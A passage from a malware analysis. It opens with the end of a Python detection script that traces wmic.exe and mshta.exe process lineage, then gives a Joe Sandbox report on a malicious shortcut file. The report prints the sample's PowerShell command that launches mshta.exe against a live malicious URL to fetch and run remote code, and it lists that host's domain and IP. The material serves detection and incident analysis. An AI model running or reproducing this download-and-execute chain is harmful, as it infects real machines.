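def wmi_launcher(by_pid, child):
    """Find the wmic.exe invocation whose Win32_Process.Create argument equals the
    child's command line, restoring the parent link that WMI hides."""
    for e in by_pid.values():
        if image_name(e) == "wmic.exe" and child["CommandLine"].strip() in e["CommandLine"]:
            return e["ProcessId"]
    return None


if __name__ == "__main__":
    by_pid, _ = build_tree(EVENTS)
    print("mshta lineage:", " <- ".join(lineage(by_pid, 4500)))
    print("launched via wmic PID:", wmi_launcher(by_pid, by_pid[4300]))
    for name, pid in detect(EVENTS):
        print(f" - {name} (pid {pid})")
```

Running it shows the lineage of mshta.exe ending at wmiprvse.exe with wmic.exe nowhere in the chain, which is why the rule set carries both a wmic.exe command-line rule and a "WmiPrvSE.exe spawned a shell" rule instead of a single parent-child rule. wmi_launcher() is the correlation step: it matches the child's command line against the argument of the wmic.exe call, which is exact here because Win32_Process.Create passes the string through unchanged.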
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX (17 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1713
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 976
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1090
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 633
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916 | Thread sleep count: 1090 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916 | Thread sleep count: 633 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8084 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: mshta.exe, 00000005.00000002.2909564054.0000028034ADA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@v
Source: mshta.exe, 00000005.00000002.2909564054.0000028034B45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2910157594.000001AC2A627000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2911686784.000001AC2FC58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000002.2909564054.0000028034AF8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnr
Source: C:\Windows\System32\wbem\WMIC.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 identical entries)
Source: C:\Windows\System32\mshta.exe | Memory allocated: page read and write | page guard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://nextgencoding.cyou/asd/amber3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (2 entries)
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation (2 entries)
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (3 entries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 entries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3 entries)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation (2 entries)
MITRE ATT&CK matrix (one row per matrix line; a bracketed number is the count shown beside that technique in the original matrix):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation [21] | DLL Side-Loading [1] | Process Injection [11] | Masquerading [11] | OS Credential Dumping | Security Software Discovery [11] | Remote Services | Email Collection [1] | Encrypted Channel [1] | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading [1] | Disable or Modify Tools [1] | LSASS Memory | Process Discovery [11] | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer [3] | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion [31] | Security Account Manager | Virtualization/Sandbox Evasion [31] | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol [3] | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection [11] | NTDS | Application Window Discovery [1] | Distributed Component Object Model | Input Capture | Application Layer Protocol [14] | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Obfuscated Files or Information [1] | LSA Secrets | File and Directory Discovery [1] | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading [1] | Cached Domain Credentials | System Information Discovery [23] | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Behavior Graph (ID: 1581246, Sample: K9esyY0r4G.lnk, Start date: 27/12/2024, Architecture: WINDOWS, Score: 88)
  Start -> nextgencoding.cyou (DNS/IP)
  Start, signatures: Antivirus detection for URL or domain; Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for submitted file; 4 other signatures
  Start -> WMIC.exe 1 (started); Start -> svchost.exe 1 1 (started)
  WMIC.exe, signatures: Contains functionality to create processes via WMI; Creates processes via WMI
  WMIC.exe -> powershell.exe 7 (started); WMIC.exe -> conhost.exe 1 (started)
  svchost.exe -> 127.0.0.1 unknown unknown
  powershell.exe (first), signatures: Windows shortcut file (LNK) starts blacklisted processes
  powershell.exe (first) -> powershell.exe 7 (started); powershell.exe (first) -> conhost.exe (started)
  powershell.exe (second), signatures: Windows shortcut file (LNK) starts blacklisted processes
  powershell.exe (second) -> mshta.exe 18 (started)
  mshta.exe -> nextgencoding.cyou 104.21.67.124, 443, 49730, 49731 CLOUDFLARENETUS United States
Source | Detection | Scanner | Label
K9esyY0r4G.lnk | 36% | Virustotal |
K9esyY0r4G.lnk | 21% | ReversingLabs | Win32.Trojan.Pantera
No Antivirus matches
Source | Detection | Scanner | Label
https://nextgencoding.cyou/asd/amber3p | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssD | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3L& | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3les/cf.errors.css | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3m | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/ | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3q | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637L | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637G | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3C: | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/cdn-cgi/phish-bypass017 | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637U | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssH | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/F | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3 | 100% | Avira URL Cloud | malware
https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssQ | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/cdn-cgi/phish-bypassN1% | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3... | 100% | Avira URL Cloud | malware
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637 | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3g | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3MS | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3H | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3_1 | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637r3_ | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3$global:? | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3ntional | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.css | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3Hi0 | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/cdn-cgi/phish-bypassv1m | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/asd/amber3https://nextgencoding.cyou/asd/amber3 | 0% | Avira URL Cloud | safe
http://go.microsoft.ctain | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/cdn-cgi/phish-bypass | 0% | Avira URL Cloud | safe
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637...; | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
nextgencoding.cyou | 104.21.67.124 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://nextgencoding.cyou/asd/amber3 | true | Avira URL Cloud: malware | unknown
https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637 | false | Avira URL Cloud: safe | unknown
https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.css | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.67.124 | nextgencoding.cyou | United States | 13335 | CLOUDFLARENETUS | true

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581246
Start date and time: 2024-12-27 09:02:50 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: K9esyY0r4G.lnk (renamed because the original name is a hash value)
